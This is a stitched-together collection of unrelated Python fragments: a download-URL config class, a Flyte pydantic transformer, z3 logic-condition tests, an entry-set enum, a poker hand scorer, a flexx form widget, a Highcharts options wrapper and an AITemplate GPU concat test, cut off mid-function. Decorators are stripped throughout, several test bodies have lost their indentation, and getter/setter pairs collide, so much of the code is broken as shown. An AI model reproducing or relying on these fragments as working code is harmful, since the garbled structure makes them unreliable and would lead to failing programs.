    # Lifetime of the returned download URL in seconds (14400 s = 4 h).
    url_expire_sec: int = field(default=14400, repr=False)
    # '*' requests every available field for the file.
    fields: GetFileFields = field(default='*', repr=False)
    # Image/video processing directives applied server-side to the
    # thumbnail/preview URLs (resize, snapshot, output format).
    image_thumbnail_process: str = field(default='image/resize,w_160/format,jpeg', repr=False)
    image_url_process: str = field(default='image/resize,w_1920/format,jpeg', repr=False)
    video_thumbnail_process: str = field(default='video/snapshot,t_0,f_jpg,ar_auto,w_800', repr=False)
class BaseModelTransformer(type_engine.TypeTransformer[pydantic.BaseModel]):
    """Flyte type transformer (de)serialising pydantic BaseModel values.

    Models are represented at the Flyte level as a generic STRUCT literal.
    """

    _TYPE_INFO = types.LiteralType(simple=types.SimpleType.STRUCT)

    def __init__(self):
        super().__init__(name='basemodel-transform', t=pydantic.BaseModel)

    def get_literal_type(self, t: Type[pydantic.BaseModel]) -> types.LiteralType:
        # Every BaseModel subtype maps to the same opaque struct literal type.
        return types.LiteralType(simple=types.SimpleType.STRUCT)

    def to_literal(self, ctx: FlyteContext, python_val: pydantic.BaseModel, python_type: Type[pydantic.BaseModel], expected: types.LiteralType) -> literals.Literal:
        # Serialisation is delegated entirely to the serialization helper.
        return serialization.serialize_basemodel(python_val)

    def to_python_value(self, ctx: FlyteContext, lv: literals.Literal, expected_python_type: Type[pydantic.BaseModel]) -> pydantic.BaseModel:
        # The literal map holds the model JSON (with placeholders) plus an
        # object store under OBJECTS_KEY; the attached deserialization store
        # resolves the placeholders while parse_raw rebuilds the model.
        basemodel_literals: BaseModelLiterals = lv.map.literals
        basemodel_json_w_placeholders = read_basemodel_json_from_literalmap(basemodel_literals)
        with deserialization.PydanticDeserializationLiteralStore.attach(basemodel_literals[serialization.OBJECTS_KEY].map):
            return expected_python_type.parse_raw(basemodel_json_w_placeholders)
class TestLogicConditionZ3():
def test_init_basic(self):
new_member = LogicCondition(Bool('x1'))
assert ((str(new_member) == 'x1') and isinstance(new_member, LogicCondition))
def test_init(self):
new_member = LogicCondition(Or(z3_symbol[1], And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_member) == '((x1 | x2) & (x1 | x3))') and isinstance(new_member, LogicCondition))
def test_initialize_true(self):
true_value = LogicCondition.initialize_true(LogicCondition.generate_new_context())
assert (true_value.is_true and isinstance(true_value, LogicCondition))
def test_initialize_false(self):
false_value = LogicCondition.initialize_false(LogicCondition.generate_new_context())
assert (false_value.is_false and isinstance(false_value, LogicCondition))
def test_initialize_symbol(self):
symbol = LogicCondition.initialize_symbol('x1', LogicCondition.generate_new_context())
assert ((str(symbol) == 'x1') and isinstance(symbol, LogicCondition))
def test_and(self):
new_term = (LogicCondition(And(z3_symbol[1], z3_symbol[2])) & LogicCondition(And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_term) == '(x1 & x2 & x3)') and isinstance(new_term, LogicCondition))
def test_iand(self):
term = (LogicCondition(z3_symbol[1]) & LogicCondition(z3_symbol[2]))
term &= LogicCondition(And(z3_symbol[2], z3_symbol[3]))
assert ((str(term) == '(x1 & x2 & x3)') and isinstance(term, LogicCondition))
def test_or(self):
new_term = (LogicCondition(And(z3_symbol[1], z3_symbol[2])) | LogicCondition(And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_term) == '((x1 | x3) & x2)') and isinstance(new_term, LogicCondition))
def test_ior(self):
term = LogicCondition(And(z3_symbol[1], z3_symbol[2]))
term |= LogicCondition(And(z3_symbol[2], z3_symbol[3]))
assert ((str(term) == '((x1 | x3) & x2)') and isinstance(term, LogicCondition))
def test_invert(self):
term = (~ LogicCondition(And(z3_symbol[1], z3_symbol[2])))
assert ((str(term) == '(!x1 | !x2)') and isinstance(term, LogicCondition))
.parametrize('z3_term, operands', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (LogicCondition(z3_symbol[1]), []), ((LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])), [LogicCondition(z3_symbol[1]), LogicCondition(z3_symbol[2])]), ((LogicCondition(z3_symbol[1]) & LogicCondition(z3_symbol[2])), [LogicCondition(z3_symbol[1]), LogicCondition(z3_symbol[2])]), ((~ LogicCondition.initialize_symbol('x1', LogicCondition.generate_new_context())), [LogicCondition(z3_symbol[1])]), (((LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])) & LogicCondition(z3_symbol[3])), [(LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])), LogicCondition(z3_symbol[3])])])
def test_operands(self, z3_term, operands):
assert ([str(op) for op in z3_term.operands] == [str(op) for op in operands])
.parametrize('term, result', _get_is_instance_test_case(true_value=True))
def test_is_true(self, term, result):
assert (term.is_true == result)
.parametrize('term, result', _get_is_instance_test_case(false_value=True))
def test_is_false(self, term, result):
assert (term.is_false == result)
.parametrize('term, result', _get_is_instance_test_case(or_f=True))
def test_is_disjunction(self, term, result):
assert (term.is_disjunction == result)
.parametrize('term, result', _get_is_instance_test_case(and_f=True))
def test_is_conjunction(self, term, result):
assert (term.is_conjunction == result)
.parametrize('term, result', _get_is_instance_test_case(neg_symbol=True))
def test_is_negation(self, term, result):
assert (term.is_negation == result)
.parametrize('term, result', _get_is_instance_test_case(symbol=True))
def test_is_symbol(self, term, result):
assert (term.is_symbol == result)
.parametrize('term1, term2, result', [(logic_x[1].copy(), logic_x[2].copy(), False), (logic_x[1].copy(), (~ logic_x[1].copy()), False), ((logic_x[1].copy() & logic_x[2].copy()), (logic_x[1].copy() & logic_x[2].copy()), True), ((logic_x[1].copy() & logic_x[2].copy()), logic_x[2].copy(), False), ((logic_x[1].copy() & logic_x[2].copy()), (logic_x[2].copy() & logic_x[1].copy()), True), ((logic_x[1].copy() & (logic_x[2].copy() | logic_x[3].copy())), ((logic_x[3].copy() | logic_x[2].copy()) & logic_x[1].copy()), True)])
def test_is_equal_to(self, term1, term2, result):
assert (term1.is_equal_to(term2) == result)
.parametrize('term, result', _get_normal_forms('cnf'))
def test_to_cnf(self, term, result):
assert term.is_equal_to(result)
.parametrize('term, result', _get_normal_forms('dnf'))
def test_to_dnf(self, term, result):
dnf_term = term.to_dnf()
assert dnf_term.z3.is_equal(dnf_term._condition, result)
.parametrize('term, simplified', [((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ (logic_x[4].copy() & logic_x[2].copy())))) & (~ ((logic_x[5].copy() & logic_x[2].copy()) & (~ logic_x[1].copy())))), (logic_x[1].copy() & (~ logic_x[2].copy()))), ((((logic_x[1].copy() | (logic_x[2].copy() & (~ logic_x[1].copy()))) | (logic_x[3].copy() & (~ (logic_x[1].copy() | logic_x[2].copy())))) | ((logic_x[5].copy() & logic_x[4].copy()) & (~ logic_x[1].copy()))), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) | (logic_x[5].copy() & logic_x[4].copy()))), (((((((logic_x[1].copy() & (~ logic_x[1].copy())) | (~ logic_x[2].copy())) | (logic_x[3].copy() & (logic_x[4].copy() | (~ logic_x[4].copy())))) | (~ ((logic_x[5].copy() & logic_x[2].copy()) & (~ logic_x[1].copy())))) | ((~ (logic_x[5].copy() & (~ logic_x[5].copy()))) & logic_x[1].copy())) | (~ (logic_x[3].copy() | (~ logic_x[3].copy())))), (((logic_x[1].copy() | (~ logic_x[5].copy())) | (~ logic_x[2].copy())) | logic_x[3].copy()))])
def test_simplify(self, term, simplified):
assert (term == simplified)
.parametrize('term, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (logic_x[1].copy(), [logic_x[1].copy()]), ((~ logic_x[1].copy()), [logic_x[1].copy()]), ((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & (logic_x[5].copy() | logic_x[3].copy())), [logic_x[1].copy(), logic_x[2].copy(), logic_x[3].copy(), logic_x[4].copy(), logic_x[5].copy(), logic_x[3].copy()])])
def test_get_symbols(self, term, result):
assert (set((str(symbol) for symbol in term.get_symbols())) == set((str(symbol) for symbol in result)))
.parametrize('term, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (logic_x[1].copy(), [logic_x[1].copy()]), ((~ logic_x[1].copy()), [(~ logic_x[1].copy())]), ((logic_x[1].copy() | logic_x[2].copy()), [logic_x[1].copy(), logic_x[2].copy()]), (((~ logic_x[1].copy()) | logic_x[2].copy()), [(~ logic_x[1].copy()), logic_x[2].copy()]), ((logic_x[1].copy() & logic_x[2].copy()), [logic_x[1].copy(), logic_x[2].copy()]), ((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & ((~ logic_x[5].copy()) | (~ logic_x[3].copy()))), [logic_x[1].copy(), (~ logic_x[2].copy()), logic_x[3].copy(), (~ logic_x[4].copy()), (~ logic_x[5].copy()), (~ logic_x[3].copy())])])
def test_get_literals(self, term, result):
assert (set((str(literal) for literal in term.get_literals())) == set((str(literal) for literal in result)))
# NOTE(review): the decorator prefix (likely "@pytest.mark") appears stripped in this copy — confirm.
.parametrize('term, condition, result', [(LogicCondition.initialize_true(context), logic_x[2].copy(), LogicCondition.initialize_true(context)), (LogicCondition.initialize_false(context), logic_x[2].copy(), LogicCondition.initialize_false(context)), (logic_x[2].copy(), logic_x[2].copy(), LogicCondition.initialize_true(context)), (logic_x[2].copy(), logic_x[3].copy(), logic_x[2].copy()), ((logic_x[2].copy() | logic_x[3].copy()), logic_x[3].copy(), LogicCondition.initialize_true(context))])
def test_substitute_by_true_basics(self, term, condition, result):
    """Assuming `condition` is true must simplify `term` to `result` (base cases)."""
    assert (term.substitute_by_true(condition) == result)
# NOTE(review): the decorator prefix (likely "@pytest.mark") appears stripped in this copy — confirm.
.parametrize('condition, result', [((((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy()), LogicCondition.initialize_true(LogicCondition.generate_new_context())), (logic_x[6].copy(), ((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[7].copy())), ((logic_x[4].copy() | logic_x[5].copy()), ((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & logic_x[6].copy()) & logic_x[7].copy())), ((logic_x[6].copy() & (logic_x[4].copy() | logic_x[5].copy())), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & logic_x[7].copy())), ((logic_x[6].copy() & logic_x[7].copy()), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy()))), ((logic_x[1].copy() | logic_x[2].copy()), (((logic_x[4].copy() | logic_x[5].copy()) & logic_x[6].copy()) & logic_x[7].copy())), (((((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy()) & logic_x[8].copy()), LogicCondition.initialize_true(context))])
def test_substitute_by_true(self, condition, result):
    """substitute_by_true mutates the term in place: clauses implied by `condition` are dropped."""
    # Fixed CNF-like term; each parametrized `condition` removes a different subset of clauses.
    term = (((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy())
    term.substitute_by_true(condition)
    # The return value is not checked here — the in-place mutation is the contract under test.
    assert (term == result)
# NOTE(review): the decorator prefix (likely "@pytest.mark") appears stripped in this copy — confirm.
.parametrize('term, conditions, result', [((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.equal, [var_a, constant_5]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], logic_x[1].copy()), ((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.less, [var_a, constant_5]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], (logic_x[1].copy() & logic_x[2].copy())), ((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.less, [var_a, constant_20]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], logic_x[2].copy()), ((logic_x[1].copy() & (~ logic_x[2].copy())), [Condition(OperationType.less, [var_a, constant_20]), Condition(OperationType.greater_us, [var_a, constant_10])], (~ logic_x[2].copy()))])
def test_remove_redundancy(self, term, conditions, result):
    """remove_redundancy() drops conjuncts whose pseudo-condition is implied by the others."""
    # Minimal ConditionHandler stand-in: maps each Condition to a fresh symbol x<i> plus its
    # z3 translation, which is all remove_redundancy needs to reason about implications.
    class MockConditionHandler(ConditionHandler):
        LogicCondition = generate_logic_condition_class(Z3LogicCondition)
        PseudoLogicCondition = generate_logic_condition_class(Z3LogicCondition)

        def add_condition(self, condition: Condition) -> LogicCondition:
            # Register `condition` under a new symbol and return that symbol.
            symbol = self._get_next_symbol()
            z3_condition = PseudoLogicCondition.initialize_from_condition(condition, self._logic_context)
            condition_symbol = ConditionSymbol(condition, symbol, z3_condition)
            self._condition_map[symbol] = condition_symbol
            return symbol

        def _get_next_symbol(self) -> Z3LogicCondition:
            # Symbols are numbered sequentially: x1, x2, ...
            self._symbol_counter += 1
            return LogicCondition.initialize_symbol(f'x{self._symbol_counter}', self._logic_context)

    condition_handler = MockConditionHandler()
    # The handler must share the term's logic context so symbols resolve against it.
    condition_handler._logic_context = term.context
    for cond in conditions:
        condition_handler.add_condition(cond)
    term.remove_redundancy(condition_handler)
    assert (term == result)
# NOTE(review): the decorator prefix (likely "@pytest.mark") appears stripped in this copy — confirm.
.parametrize('term, bound, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), 100, BoolVal(True)), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), 100, BoolVal(False)), (((((~ logic_x[1].copy()) | logic_x[2].copy()) & (logic_x[3].copy() | (~ logic_x[1].copy()))) & (logic_x[4].copy() | (logic_x[2].copy() & logic_x[3].copy()))), 100, Or(And(z3_symbol[3], z3_symbol[2]), And(z3_symbol[4], Not(z3_symbol[1])))), (((logic_x[2].copy() & (~ logic_x[1].copy())) | (logic_x[3].copy() & (~ logic_x[1].copy()))), 100, And(Or(z3_symbol[2], z3_symbol[3]), Not(z3_symbol[1]))), ((((logic_x[1].copy() | (logic_x[2].copy() & (~ logic_x[1].copy()))) | (logic_x[3].copy() & (~ (logic_x[1].copy() | logic_x[2].copy())))) | ((logic_x[5].copy() & logic_x[4].copy()) & (~ logic_x[1].copy()))), 100, Or(z3_symbol[1], z3_symbol[2], z3_symbol[3], And(z3_symbol[5], z3_symbol[4]))), (((((~ logic_x[1].copy()) | logic_x[2].copy()) & (logic_x[3].copy() | (~ logic_x[1].copy()))) & (logic_x[4].copy() | (logic_x[2].copy() & logic_x[3].copy()))), 5, And(Or(Not(z3_symbol[1]), z3_symbol[2]), Or(z3_symbol[3], Not(z3_symbol[1])), Or(z3_symbol[4], z3_symbol[2]), Or(z3_symbol[4], z3_symbol[3])))])
def test_simplify_to_shortest(self, term, bound, result):
    """simplify_to_shortest(bound) picks the shortest equivalent form found within `bound`.

    A small bound (last case) settles for the CNF form instead of the globally shortest one.
    """
    # Equality is checked at the z3 level, not structurally on the wrapper objects.
    assert term.z3.is_equal(term.simplify_to_shortest(bound)._condition, result)
# NOTE(review): the decorator prefix (likely "@pytest.mark") appears stripped in this copy — confirm.
.parametrize('term, result', [((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & (logic_x[5].copy() | (~ logic_x[3].copy()))), '(a < 0x1 & b == 0x2 & (c <= 0x3 | d <= 0x4) & (e >= 0x5 | c > 0x3))'), (((((logic_x[1].copy() | (~ logic_x[2].copy())) & (logic_x[2].copy() | logic_x[5].copy())) & (logic_x[2].copy() | (~ logic_x[4].copy()))) & logic_x[3].copy()), '((a < 0x1 | b == 0x2) & (b != 0x2 | e >= 0x5) & (b != 0x2 | d <= 0x4) & c <= 0x3)')])
def test_rich_string_representation(self, term, result):
    """Symbols render as their mapped Conditions; negated symbols render as the negated Condition."""
    # x1..x5 map to comparisons over a..e; e.g. ~x2 ("b != 2" negated) prints as "b == 0x2".
    condition_map = {logic_x[1].copy(): Condition(OperationType.less, [Variable('a'), Constant(1)]), logic_x[2].copy(): Condition(OperationType.not_equal, [Variable('b'), Constant(2)]), logic_x[3].copy(): Condition(OperationType.less_or_equal, [Variable('c'), Constant(3)]), logic_x[4].copy(): Condition(OperationType.greater, [Variable('d'), Constant(4)]), logic_x[5].copy(): Condition(OperationType.greater_or_equal, [Variable('e'), Constant(5)])}
    assert (term.rich_string_representation(condition_map) == result)
class EntrySetType(Enum):
    """Categories of entry sets, with helpers to parse and type-check them.

    NOTE(review): the helpers below read like classmethods (``cls`` first
    parameter); the ``@classmethod`` decorators appear stripped in this copy — confirm.
    """

    IN: str = 'in'
    INTRA: str = 'intra'
    MIXED: str = 'mixed'
    OUT: str = 'out'

    def has_value(cls, value: str) -> bool:
        # Fast membership check against the precomputed value set (module-level).
        return value in _entry_set_type_values

    def get_entry_set_type_from_string(cls, entry_set_type: str) -> Optional['EntrySetType']:
        """Parse a case-insensitive string into a member; return None on any invalid input."""
        if isinstance(entry_set_type, str) and EntrySetType.has_value(entry_set_type.lower()):
            return EntrySetType[entry_set_type.upper()]
        return None

    def type_check_from_string(cls, name: str, entry_set_type: str) -> 'EntrySetType':
        """Parse like get_entry_set_type_from_string, but raise instead of returning None."""
        Configuration.type_check_string(name, entry_set_type)
        if not isinstance(entry_set_type, str):
            raise RP2TypeError(f"Parameter '{name}' is not of type string: {entry_set_type}")
        parsed = cls.get_entry_set_type_from_string(entry_set_type)
        if parsed is None:
            raise RP2ValueError(f"Parameter '{name}' has invalid entry set type value: {entry_set_type}")
        return parsed

    def type_check(cls, name: str, entry_set_type: 'EntrySetType') -> 'EntrySetType':
        """Validate that `entry_set_type` already is an EntrySetType; raise RP2TypeError otherwise."""
        Configuration.type_check_parameter_name(name)
        if isinstance(entry_set_type, cls):
            return entry_set_type
        raise RP2TypeError(f"Parameter '{name}' is not of type {cls.__name__}: {entry_set_type}")
.django_db
def test_double_eclipsing_filters2(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {'require': [_fa_path(BASIC_TAS)], 'exclude': [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert (resp.json()['results'] == []) |
class HoldemPokerScore(Score):
    """Score of a Texas Hold'em hand: a category constant plus up to five kicker cards.

    Category constants are ordered by increasing hand strength.
    """

    NO_PAIR = 0
    PAIR = 1
    TWO_PAIR = 2
    TRIPS = 3
    STRAIGHT = 4
    FLUSH = 5
    FULL_HOUSE = 6
    QUADS = 7
    STRAIGHT_FLUSH = 8

    def strength(self):
        """Pack category and card ranks into a single comparable integer.

        Each of the five card slots gets 4 bits; a missing slot (hand shorter
        than five cards) still shifts, contributing zero bits.
        """
        packed = self.category
        for slot in range(5):
            packed <<= 4
            try:
                packed += self.cards[slot].rank
            except IndexError:
                pass  # fewer than five cards: leave this slot as zero
        return packed

    def cmp(self, other):
        """Three-way comparison on packed strength: -1 (weaker), 0 (equal), or 1 (stronger).

        NOTE(review): ``self.strength`` is accessed without a call — presumably a
        stripped ``@property`` decorator; confirm against the original file.
        """
        mine = self.strength
        theirs = other.strength
        if mine < other.strength:
            return -1
        if mine > theirs:
            return 1
        return 0
def test_config_from_str_invalid_section():
    """A subsection under a key set to null must be rejected, at any nesting depth."""
    invalid_configs = (
        '[a]\nb = null\n\n[a.b]\nc = 1',
        '[a]\nb = null\n\n[a.b.c]\nd = 1',
    )
    for config_str in invalid_configs:
        with pytest.raises(ConfigValidationError):
            Config().from_str(config_str)
class Example(flx.Widget):
    """Widget showing a small Bootstrap-styled form that adds person cards.

    NOTE(review): property setters/reactions normally carry flexx decorators
    (e.g. @flx.action, @flx.reaction) — they appear stripped in this copy; confirm.
    """

    # Tuple of (name, info) pairs, one per rendered card.
    persons = flx.TupleProp((), doc=' People to show cards for')
    first_name = flx.StringProp('', settable=True)
    last_name = flx.StringProp('', settable=True)

    def add_person(self, name, info):
        # Props are immutable; copy to a list, append, then mutate the prop.
        ppl = list(self.persons)
        ppl.append((name, info))
        self._mutate_persons(ppl)

    def _button_clicked(self, *events):
        # Submit handler: turn the current form fields into a new card.
        self.add_person(self.first_name, self.last_name)

    def _render_dom(self):
        # Form: two text inputs bound to the name props plus a submit button.
        form_nodes = [flx.create_element('div', {'class': 'form-group mb-2'}, flx.create_element('input', {'class': 'form-control', 'id': 'inputFirstName', 'oninput': (lambda e: self.set_first_name(e.target.value))}, 'First name')), flx.create_element('div', {'class': 'form-group mx-sm-3 mb-2'}, flx.create_element('input', {'class': 'form-control', 'id': 'inputLastName', 'oninput': (lambda e: self.set_last_name(e.target.value))}, 'Last name')), flx.create_element('button', {'class': 'btn btn-primary mb-2', 'onclick': self._button_clicked}, 'Submit')]
        # One Bootstrap card per stored person.
        card_nodes = []
        for (name, info) in self.persons:
            person_node = flx.create_element('div', {'class': 'card'}, flx.create_element('div', {'class': 'card-body'}, flx.create_element('h5', {'class': 'card-title'}, name), flx.create_element('p', {'class': 'card-text'}, info)))
            card_nodes.append(person_node)
        return flx.create_element('div', {}, flx.create_element('div', {'class': 'form-inline'}, form_nodes), *card_nodes)
class OptionPlotoptionsLineSonificationTracksMappingRate(Options):
    """Generated wrapper for the Highcharts `plotOptions.line.sonification.tracks.mapping.rate` options.

    Each option is exposed as a getter/setter pair sharing one name.
    NOTE(review): the pairs were presumably @property / @<name>.setter — the
    decorators appear stripped in this copy; confirm against the generator output.
    """

    def mapFunction(self):
        # Getter: no configured default.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class StridedReshapeCatTestCase(unittest.TestCase):
    """Tests that group_gemm outputs can be reshaped and concatenated via strided fusion.

    Verifies both the graph transformation (concat input_masks, fused src_ops)
    and numerical equivalence against a PyTorch reference.
    """

    def __init__(self, *args, **kwargs):
        super(StridedReshapeCatTestCase, self).__init__(*args, **kwargs)
        # Counter used to give each compiled test module a unique .so name.
        self.test_count = 1

    def _test_strided_reshape_cat(self, num_cat_ops=1, dtype='float16'):
        """Build group_gemm -> reshape/unsqueeze -> concat and check fusion + numerics."""
        target = detect_target()
        if (int(target._arch) < 80):
            _LOGGER.warning('Group Gemm need SM80 HW')
            return
        # Three GEMM problem sizes; all share M so outputs reshape to [BS, -1, Input_N].
        M1 = 128
        N1 = 32
        K1 = 32
        M2 = 128
        N2 = 8
        K2 = 16
        M3 = 128
        N3 = 16
        K3 = 16
        BS = 128
        Input_M = 2
        Input_N = 8
        dim = 1
        X1 = Tensor(shape=[IntImm(M1), IntImm(K1)], dtype=dtype, name='x1', is_input=True)
        W1 = Tensor(shape=[N1, K1], dtype=dtype, name='w1', is_input=True)
        X2 = Tensor(shape=[IntImm(M2), IntImm(K2)], dtype=dtype, name='x2', is_input=True)
        W2 = Tensor(shape=[N2, K2], dtype=dtype, name='w2', is_input=True)
        X3 = Tensor(shape=[IntImm(M3), IntImm(K3)], dtype=dtype, name='x3', is_input=True)
        W3 = Tensor(shape=[N3, K3], dtype=dtype, name='w3', is_input=True)
        Input = Tensor(shape=[BS, Input_M, Input_N], dtype=dtype, name='input', is_input=True)
        group_gemm_op = ops.group_gemm_rcr()
        (Y1_orig, Y2_orig, Y3_orig) = group_gemm_op(operand_groups=[[X1, W1], [X2, W2], [X3, W3]])
        Y1 = ops.reshape()(Y1_orig, [BS, (- 1), Input_N])
        Y2 = ops.unsqueeze(dim)(Y2_orig)
        Y3 = ops.reshape()(Y3_orig, [BS, (- 1), Input_N])
        Y1._attrs['name'] = 'y1'
        Y2._attrs['name'] = 'y2'
        Y3._attrs['name'] = 'y3'
        if (num_cat_ops == 1):
            # Single concat over all four pieces.
            concat_op = ops.concatenate()
            Y = concat_op([Y1, Y2, Input, Y3], dim=dim)
        else:
            # Two partial concats whose results are reshaped and concatenated again;
            # the compiler is expected to collapse these into one fused concat.
            concat_op_1 = ops.concatenate()
            concat_op_2 = ops.concatenate()
            Y4 = concat_op_1([Y1, Y2], dim=dim)
            Y5 = concat_op_2([Input, Y3], dim=dim)
            Y6 = ops.reshape()(Y4, [BS, (- 1), Input_N])
            Y7 = ops.reshape()(Y5, [BS, (- 1), Input_N])
            Y = ops.concatenate()([Y6, Y7], dim=dim)
        Y._attrs['name'] = 'y'
        Y._attrs['is_output'] = True
        dll_name = f'test_{self.test_count}.so'
        module = compile_model([Y], target, './tmp', 'strided_reshape_cat', dll_name=dll_name)
        # Graph checks: Y should be produced by the gemm and the (fused) concat;
        # input_masks=False marks inputs written directly by the gemm (fused away).
        Y_src_ops = Y._attrs['src_ops']
        if (num_cat_ops == 1):
            np.testing.assert_equal(len(Y_src_ops), 2)
            np.testing.assert_equal(Y_src_ops, StableSet({group_gemm_op, concat_op}))
            np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True, False])
        else:
            Y_src_ops = list(Y_src_ops)
            np.testing.assert_equal(len(Y_src_ops), 2)
            concat_op = (Y_src_ops[0] if (Y_src_ops[0]._attrs['op'] == 'concatenate') else Y_src_ops[1])
            np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True, False])
        expected_inputs_group_gemm_op = [X1, W1, X2, W2, X3, W3]
        np.testing.assert_equal(expected_inputs_group_gemm_op, group_gemm_op._attrs['inputs'])
        # PyTorch reference computation.
        X1_pt = get_random_torch_tensor([M1, K1], dtype)
        W1_pt = get_random_torch_tensor([N1, K1], dtype)
        X2_pt = get_random_torch_tensor([M2, K2], dtype)
        W2_pt = get_random_torch_tensor([N2, K2], dtype)
        X3_pt = get_random_torch_tensor([M3, K3], dtype)
        W3_pt = get_random_torch_tensor([N3, K3], dtype)
        Input_pt = get_random_torch_tensor([BS, Input_M, Input_N], dtype)
        Y1_orig_pt = torch.nn.functional.linear(X1_pt, W1_pt)
        Y2_orig_pt = torch.nn.functional.linear(X2_pt, W2_pt)
        Y3_orig_pt = torch.nn.functional.linear(X3_pt, W3_pt)
        Y1_pt = torch.reshape(Y1_orig_pt, [BS, (- 1), Input_N])
        Y2_pt = torch.unsqueeze(Y2_orig_pt, dim)
        Y3_pt = torch.reshape(Y3_orig_pt, [BS, (- 1), Input_N])
        Y_pt = torch.cat([Y1_pt, Y2_pt, Input_pt, Y3_pt], dim=dim)
        y_shape = [var._attrs['values'][0] for var in Y._attrs['shape']]
        _LOGGER.info('AITemplate y_shape: {}'.format(y_shape))
        np.testing.assert_equal(y_shape, Y_pt.size())
        inputs = {'x1': X1_pt, 'w1': W1_pt, 'x2': X2_pt, 'w2': W2_pt, 'x3': X3_pt, 'w3': W3_pt, 'input': Input_pt}
        y = get_torch_empty_tensor(y_shape, dtype)
        module.run_with_tensors(inputs, [y])
        # Loose tolerances to accommodate fp16 accumulation differences.
        self.assertTrue(torch.allclose(Y_pt, y, atol=0.1, rtol=0.1))
        self.test_count += 1

    def _test_strided_reshape_cat_bias(self, dtype='float16'):
        """Same as _test_strided_reshape_cat but with group_gemm_rcr_bias and two GEMMs."""
        target = detect_target()
        if (int(target._arch) < 80):
            _LOGGER.warning('Group Gemm need SM80 HW')
            return
        M1 = 128
        N1 = 32
        K1 = 32
        M2 = 128
        N2 = 8
        K2 = 16
        BS = 128
        Input_M = 2
        Input_N = 8
        dim = 1
        X1 = Tensor(shape=[IntImm(M1), IntImm(K1)], dtype=dtype, name='x1', is_input=True)
        W1 = Tensor(shape=[N1, K1], dtype=dtype, name='w1', is_input=True)
        B1 = Tensor(shape=[N1], dtype=dtype, name='b1', is_input=True)
        X2 = Tensor(shape=[IntImm(M2), IntImm(K2)], dtype=dtype, name='x2', is_input=True)
        W2 = Tensor(shape=[N2, K2], dtype=dtype, name='w2', is_input=True)
        B2 = Tensor(shape=[N2], dtype=dtype, name='b2', is_input=True)
        Input = Tensor(shape=[BS, Input_M, Input_N], dtype=dtype, name='input', is_input=True)
        group_gemm_op = ops.group_gemm_rcr_bias()
        (Y1_orig, Y2_orig) = group_gemm_op(operand_groups=[[X1, W1, B1], [X2, W2, B2]])
        Y1 = ops.reshape()(Y1_orig, [BS, (- 1), Input_N])
        Y2 = ops.unsqueeze(dim)(Y2_orig)
        Y1._attrs['name'] = 'y1'
        Y2._attrs['name'] = 'y2'
        concat_op = ops.concatenate()
        Y = concat_op([Y1, Y2, Input], dim=dim)
        Y._attrs['name'] = 'y'
        Y._attrs['is_output'] = True
        dll_name = f'test_{self.test_count}.so'
        module = compile_model([Y], target, './tmp', 'strided_reshape_cat_bias', dll_name=dll_name)
        Y_src_ops = Y._attrs['src_ops']
        np.testing.assert_equal(len(Y_src_ops), 2)
        np.testing.assert_equal(Y_src_ops, StableSet({group_gemm_op, concat_op}))
        np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True])
        expected_inputs_group_gemm_op = [X1, W1, B1, X2, W2, B2]
        np.testing.assert_equal(expected_inputs_group_gemm_op, group_gemm_op._attrs['inputs'])
        X1_pt = get_random_torch_tensor([M1, K1], dtype)
        W1_pt = get_random_torch_tensor([N1, K1], dtype)
        B1_pt = get_random_torch_tensor([N1], dtype)
